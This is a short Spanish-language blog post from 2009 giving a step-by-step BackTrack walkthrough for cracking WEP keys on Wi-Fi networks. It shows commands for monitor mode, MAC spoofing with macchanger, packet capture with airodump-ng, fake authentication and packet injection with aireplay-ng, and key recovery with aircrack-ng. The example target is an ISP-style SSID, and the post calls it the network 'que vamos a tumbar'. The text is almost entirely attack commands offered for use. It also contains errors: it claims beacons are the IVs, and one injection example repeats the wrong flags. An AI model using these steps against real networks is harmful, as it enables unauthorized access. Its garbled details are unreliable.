El Creador

Mi foto
Mexico

jueves, 10 de septiembre de 2009

Manual BackTrack

Descifrado WEP

1. se lee el iv
2. se pega el iv ala clave wep
3. se genera el rc4 keystream
4. se hace XOR   mensaje cifrado / rc4 keystream
5. se obtiene el icv
6. se comprueba el icv



Modo Managed

Modo Monitor


EN BACKTRACK



1.ABRIR SHELL

2.Ver el modo en que esta
iwconfig

3.CAMBIAR DE MODO MANAGED A MODO MONITOR

iwconfig INTERFAZQUESEVAAMANEJAR mode monitor
EJ: iwconfig wlan0 mode monitor


"ls" = "dir" en windows
"rm" para borrar archivos
"clear"= borrar pantalla

4.CAMBIAR LA MAC
macchanger -m MACNUEVA INTERFAZAMANEJAR
EJ: macchanger -m 00:11:22:33:44:55 wlan0

5. para ver las redes
airodump-ng INTERFAZQUESEVAAMANEJAR
EJ: airodump-ng wlan0


"PWR" PODER DE LA SE�AL EN %
"BEACONS"  SON LOS IV'S
"#DATA" LOS PAQUETES MAS DE 5000 PARA SABER WEP

6.CAPTURAR EN PAQUETES DEL CANAL X Y GUARDARLO EN ARCHIVO Y
airodump-ng -c CANAL -w ARCHIVO INTERFAZQUESEVAAMANEJAR
EJ: airodump-ng -c 11 -w INFINITUM0000 wlan0

PARA CAPTURAR UNA BSSID EN ESPECIFICO

airodump-ng -c CANAL --bssid MACDELACCESSPOINT  -w ARCHIVO wlan0
EJ: airodump-ng -c 11 --bssid 00:AA:BB:CC:DD:FF  -w INFINITUM0000 wlan0
si pide -a mac adress


7.AUTENFICACION FALSA CON EL ROUTER
aireplay-ng -e SSID -a MACDELACCESSPOINT -h MACNUESTRAPC -1 0 INTERFAZQUESEVAAMANEJAR

EJ: aireplay-ng -e INFINITUM0000 -a 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -1 0 wlan0

"-e" SSID
"-1" ATAQUE DE AUTENTIFICACION FALSA
"0" INFINITO

8.INYECTAR

aireplay-ng -e SSID -b MACDELACCESSPOINT -h MACNUESTRAPC -3 INTERFAZQUESEVAAMANEJAR

EJ: aireplay-ng -e INFINITUM0000 -b 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -3 wlan0




o

aireplay-ng -e SSID -a MACDELACCESSPOINT -h MACNUESTRAPC -3 INTERFAZQUESEVAAMANEJAR

EJ: aireplay-ng -e INFINITUM0000 -a 00:AA:BB:CC:DD:FF -h 00:11:22:33:44:55 -1 0 wlan0


"-b" MAC DEL AP
"-3" PARA INYECTAR

9.SABER LA WEP
aircrack-ng ARCHIVO
EJ: aircrack-ng INFINITUM0000
escoger la red que queremos, en caso de que aparezcan varias, y esperamos hasta que aparezca la clave wep

y listo!!!!

Nota: Es conveniente cambiar la MAC a 00:11:22:33:44:55 y que el archivo se llame de la misma forma que la red que vamos a tumbar para que sea mas facil el proceso
Publicado por a las
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)